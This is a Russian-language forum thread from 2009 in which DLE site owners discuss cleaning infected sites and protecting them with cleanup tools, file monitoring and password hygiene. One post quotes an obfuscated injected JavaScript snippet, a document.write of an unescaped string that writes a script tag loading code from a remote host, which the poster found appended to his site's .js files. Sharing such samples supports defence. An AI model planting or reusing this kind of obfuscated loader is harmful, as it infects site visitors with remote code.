Помощь Чистка сайта на DLE от вирусов + методы защиты

Тема в разделе "DLE", создана пользователем Tamplier, 8 май 2009.

Информация :
Актуальная версия DataLife Engine 12.0
( Final Release v.12.0 | Скачать DataLife Engine | Скачать 12.0 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.3 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Tamplier

    Tamplier

    Регистр.:
    19 июл 2008
    Сообщения:
    222
    Симпатии:
    16
    Собственно предлагаю составить список тех файлов, куда обычно пихают свои ссылки взломщики и как их определить? К примеру, точно и наиболее часто эксплоиты льют в index.php и index.html
    Но на паре сайтов я так и не нашел вируса в этих файлах (равно как и во всех пхп-файлах сайта), но вирус как был, так и оставался, не спасла даже переустановка движка (помог лишь снос базы и создание с нуля сайта)
    Думаю с подобным сталкивался каждый. И алгоритм от специалистов по чистке сайта на ДЛЕ от заразы будет полезен всем.

    Прошу высказаться всех, кто имеет какой-либо опыт в данном случае.
     
  2. acelotuse

    acelotuse

    Регистр.:
    31 мар 2009
    Сообщения:
    312
    Симпатии:
    37
    слыхал на одном из форумов, что вирус сидел в engine/skins/default.skin.php кажись, если не изменяет память. Больше об этом ничего не знаю, так что сам буду благодарен на любую помощь и разъяснения в этом вопросе.
     
  3. nullcash

    nullcash

    Регистр.:
    15 июл 2008
    Сообщения:
    252
    Симпатии:
    194
    у Друга попадался вирусы в файлах static_print.tpl+print.tpl - удалили элементарной заменой файлов.
     
  4. masima

    masima

    Регистр.:
    9 мар 2007
    Сообщения:
    733
    Симпатии:
    1.338
    Выкачать сайт и с помощью Архивариус 3000 найти линки.
    Воспользоваться штатным антивирусом дле.
    После чистки советую установить http://dikij.com/scripts/antiworm/
    http://dikij.com/scripts/antiworm/antiworm.zip
    Главное всё правильно настроить :)
     
    dragonstyle, baltazorg и Tamplier нравится это.
  5. neTpo

    neTpo Постоялец

    Регистр.:
    16 дек 2008
    Сообщения:
    58
    Симпатии:
    42
    У меня недавно все сайты позаражались вирусами..
    Перечистил все файлы index.* main.tpl также обнаружыл в 50% *.js скриптах кусок дописаного закоментированого кода в конце..
    PHP:
    <!-- 
    document.write(unescape('%3CsrEcr4piaxcpt%20rEskXr4pcMtY%3DkX%2F%2F4p9GWJ4IED%2E247%2EUW2UW%2ErE19GWJ54p%2FjqueaxcrIEDy%2Eaxcj4ps4p%3E%3C%2FsckXrrEiptUW%3E').replace(/kX|GWJ|MtY|4p|IED|rE|UW|axc/g,""));
     -->
    код в *.js файлах выглядел примерно так..
    Боролся я с помощью рук.. скопировал все файлы движка на комп нашел все файлы *.js и кинул их в нотепад++ и ручками стирал код... но всеравно остался вирус... потом вышел дле 8,0 я обновил двиг и все стало по своим местам..
    А по поводу защиты нашол интересный ресурс http://www.siteguard.ru/
    вы добавляете свой сайт в систему и если у вас меняется код сайта то он вас информирует в аську или мыло..
    Да и ище много читал по защите и везде пишут НЕ ХРАНИТЬ ПАРОЛИ В ФТП ПРОГРАММАХ, то есть нельзя хранит в тотале или же файрзилле...
    По поводу антивирусников скажу что когда лазиш по cайтма то только нод матюгаеться на вирусы (ифреймы).. а как пишут половина сайтов что типа авира победит всех ет феня..
    Да и если вы думаете что если вы проверите файлы антивирусником то вам поможет.. вы глубоко ошибаетесь...
    В общем по защите скажу одно.. меняйте все пароли на фтп и везде.. и устанавливайте ХОРОШИЙ антивирусник.. (я себе поставил каспера 6) проверяйте комп и некогда его не выключайте..
    Да кстати ваш хостер не имеит не какого отношения к вашим вирусам... так что не будем им надоедать и будем сами решать свои проблемы.
    Вот собственно все если что то вспомню допишу
     
  6. felix90

    felix90 Постоялец

    Регистр.:
    16 июл 2007
    Сообщения:
    109
    Симпатии:
    20
    1) Не всегда хостер не имеет никакого отношения к вашим вирусам (как вы выразились) Взлом хостинг провайдера уже не в счёт?

    2) Касперский далеко не лучший антивирус!

    3) Выключать компьютер - это не предложение, а идиотизм! :D

    От себя скажу, что действительно лучше не оставлять сохранённые пароли в ftp клиентах, почаще пользоваться встроенным антивирусом dle, регулярно делать бекап базы данных и, по возможности, всех файлов движка.
     
  7. Crees

    Crees Постоялец

    Регистр.:
    4 май 2008
    Сообщения:
    143
    Симпатии:
    13
    Я так понимаю что вирусы на сайт могут попасть не только при заливки с зараженного компьютера? Т.е. всегда есть риск что зальют вирус даже если сайт изначально на чистой площадке?
     
  8. felix90

    felix90 Постоялец

    Регистр.:
    16 июл 2007
    Сообщения:
    109
    Симпатии:
    20
    Конечно. Ещё возьмём, к примеру, ошибку хостера. Если поставить чистый директ админ и ничего особенного больше не делать с защитой, то любой клиент этого хостера сможет изменить ваши файлы, права на которых будут стоять 777. То есть, например, шаблон сайта. ;)
     
  9. Tamplier

    Tamplier

    Регистр.:
    19 июл 2008
    Сообщения:
    222
    Симпатии:
    16
    Или как минимум меняйте расположение файла с паролями в другое место - трой с дефолтного места обычно считывает.
     
  10. Crees

    Crees Постоялец

    Регистр.:
    4 май 2008
    Сообщения:
    143
    Симпатии:
    13
    У меня vds. Я имел ввиду может ли любая гадость вшиться в мой index.php или любой другой файл дле движка? Я так понимаю через уязвимость только?
    Он нашел 2 подозрительных js
    Код:
    <script language="JavaScript"> var showDate= 1; function ShowDateTime(dateStyle) { var today = new Date(); var dStr = ""; switch (dateStyle) { case showDate: default: dStr = today.toLocaleDateString(); break; } document.write(dStr); } </script>
    и
    Код:
    <script language="javascript" type="text/javascript"> <!-- function doVote( event ){ var frm = document.vote; var vote_check = ''; for (var i=0; i < frm.elements.length; i++) { var elmnt = frm.elements[i]; if (elmnt.type=='radio') { if(elmnt.checked == true){ vote_check = elmnt.value; break;} } } var ajax = new dle_ajax(); ajax.onShow (''); var varsString = ""; ajax.setVar("vote_id", "7" ); ajax.setVar("vote_action", event); ajax.setVar("vote_check", vote_check); ajax.setVar("vote_skin", "mmo"); ajax.requestFile = dle_root + "engine/ajax/vote.php"; ajax.method = 'GET'; ajax.element = 'vote-layer'; ajax.sendAJAX(varsString); } //--> </script>
    А это js'ы дле вроде, за вотинг и мой скрипт вывода даты. Скорее всего сайтгард базируется на основе функций которые могут быть использованы в злокачественных целях, ифреймы разные и т.д.
     
Статус темы:
Закрыта.